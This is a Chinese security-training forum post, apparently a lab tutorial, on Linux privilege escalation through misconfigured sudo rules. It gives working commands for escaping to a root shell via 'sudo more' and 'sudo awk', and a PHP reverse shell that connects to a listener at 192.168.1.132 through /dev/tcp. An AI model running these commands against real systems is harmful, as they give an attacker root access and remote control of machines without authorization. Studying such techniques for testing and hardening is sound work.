sudu提权-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

sudu提权

[复制链接]
发表于 2023-1-15 10:19:22 | 显示全部楼层 |阅读模式

参考网站:https://gtfobins.github.io/

kali linux 下etc/sudoers 文件解析
  1. vim /etc/sudoers
复制代码
截图202301150218277607.png

sudo su 命令
当使用sudo命令进行提权时,需要验证当前用户的密码:



一,sudo more 命令提权
修改文件 /etc/sudoers
  1. kali ALL=(ALL) /usr/bin/more
复制代码
截图202301150917122876.png


在执行命令时:
截图202301150918067636.png

提权方法:
执行
  1. sudo more /etc/passwd
复制代码
接着输入
  1. !/bin/sh
复制代码
提权成功,如图

截图202301150919506741.png

二,sudo awk 提权
修改文件 /etc/sudoers
截图202301150931575878.png
执行命令:
  1. sudo awk 'BEGIN{system("/bin/sh")}'
复制代码
提权成功
截图202301150935513686.png

三,php反弹提权
先在kali下执行以下命令,重建一下软连接

  1. rm -rf /bin/sh
  2. ln -s /bin/bash /bin/sh
复制代码
修改文件 /etc/sudoers
截图202301151025113503.png

公网执行nc命令监听:
  1. nc -lvp 1234
复制代码


截图202301151025426920.png

kali 下执行
  1. sudo php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/bash -i >& /dev/tcp/192.168.1.132/1234 0>&1");'
复制代码


截图202301151027359366.png

查看公网cmd窗口变化
截图202301151028117203.png
提权成功。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表